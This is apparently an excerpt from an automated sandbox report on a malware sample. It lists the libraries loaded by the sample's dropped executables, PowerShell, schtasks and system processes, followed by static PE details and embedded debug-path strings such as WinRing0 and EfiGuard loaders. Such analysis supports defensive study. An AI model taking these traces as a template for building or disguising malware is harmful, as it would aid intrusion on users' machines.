                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | Section loaded: wintypes.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
                        Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
                        Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe Section loaded: apphelp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\servicing\TrustedInstaller.exe Section loaded: dbghelp.dll
                        Source: C:\Windows\servicing\TrustedInstaller.exe Section loaded: dbgcore.dll
                        Source: C:\Windows\servicing\TrustedInstaller.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: seclogon.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: msvcr100.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: powrprof.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: umpdc.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: wtsapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: winsta.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: sxs.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
                        Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: userenv.dll
                        Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
                        Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
                        Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
                        Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
                        Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
                        Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
                        Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
                        Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
                        Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
                        Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exe Section loaded: amsi.dll
                        Source: C:\Windows\explorer.exe Section loaded: profapi.dll
                        Source: C:\Windows\explorer.exe Section loaded: msasn1.dll
                        Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
                        Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
                        Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Desktop\25C1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeWindow found: window name: TButtonJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\25C1.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: 25C1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: 25C1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: 25C1.exeStatic file information: File size 9104384 > 1048576
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                        Source: 25C1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x8ae200
                        Source: 25C1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\xericuzakiziy64\dayolev xadesowip kijo.pdbT source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000000.1358564663.0000000000807000.00000002.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000000.1462221086.0000000000807000.00000002.00000001.01000000.00000006.sdmp
                        Source: Binary string: Loader.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: EfiGuardDxe.pdb7 source: 288c47bbc1871b439df19ff4df68f076.exe
                        Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: symsrv.pdb source: 288c47bbc1871b439df19ff4df68f076.exe
                        Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
